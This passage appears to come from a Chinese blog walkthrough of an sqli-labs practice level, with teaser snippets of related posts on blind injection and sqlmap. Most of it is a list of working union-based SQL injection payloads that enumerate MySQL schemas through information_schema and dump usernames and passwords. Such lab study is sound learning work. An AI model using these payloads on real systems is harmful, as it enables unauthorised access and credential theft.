顯示正常
』 出錯,錯誤:』『1』』) limit 0,1』,多了半個)
』) --+ 顯示正常,表明存在注入漏洞,且判斷原資料輸入應該是(『id』),輸入1』)–+後,變為(『1』)–+』),陰影部分被注釋,所以正常顯示。
』) order by 3 --+
union select 1,2,3 --+
union select 1,2,database() --+
union select 1,2,user() --+
union select 1,2,group_concat(schema_name) from information_schema.schemata --+
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+
union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+
union select 1,2,group_concat(username) from security.users–+
union select 1,2,group_concat(password) from security.users–+
union select 1,2,group_concat(concat_ws(』-』,username,password)) from security.users–+
關注關注,小白一枚,後續發布全部關卡
sqli labs學習sql注入
在sql注入時應該記住的一些東西 information schema庫存放了所有庫的資訊 information schema.columns包含了所有表的字段 table name表名 table schema資料庫名 column name列名 information schema.table...
通過sqli labs學習SQL注入(2)
我的理解是,頁面不給出任何錯誤資訊的都屬於盲注 基於布林的盲注 通過返回的頁面是否正確來判斷,如果後台做了限制,此方法無效 例如less 9,錯誤也會顯示you are in.基於報錯的盲注 構造乙個能回顯錯誤資訊的sql語句,如果後台做了限制,此方法無效 例如less 8以及後面的幾關,錯誤資訊被...
通過sqli labs學習SQL注入(4)
這次用sqlmap來通關一次sqli labs 主要使用的引數 例項演示 目標url 選擇感興趣的資料庫,這裡選擇security 檢視指定表名的列 直接dump出users表的內容 也可以加 c username dump指定列username的內容,dump alldump所有資料庫的內容 sq...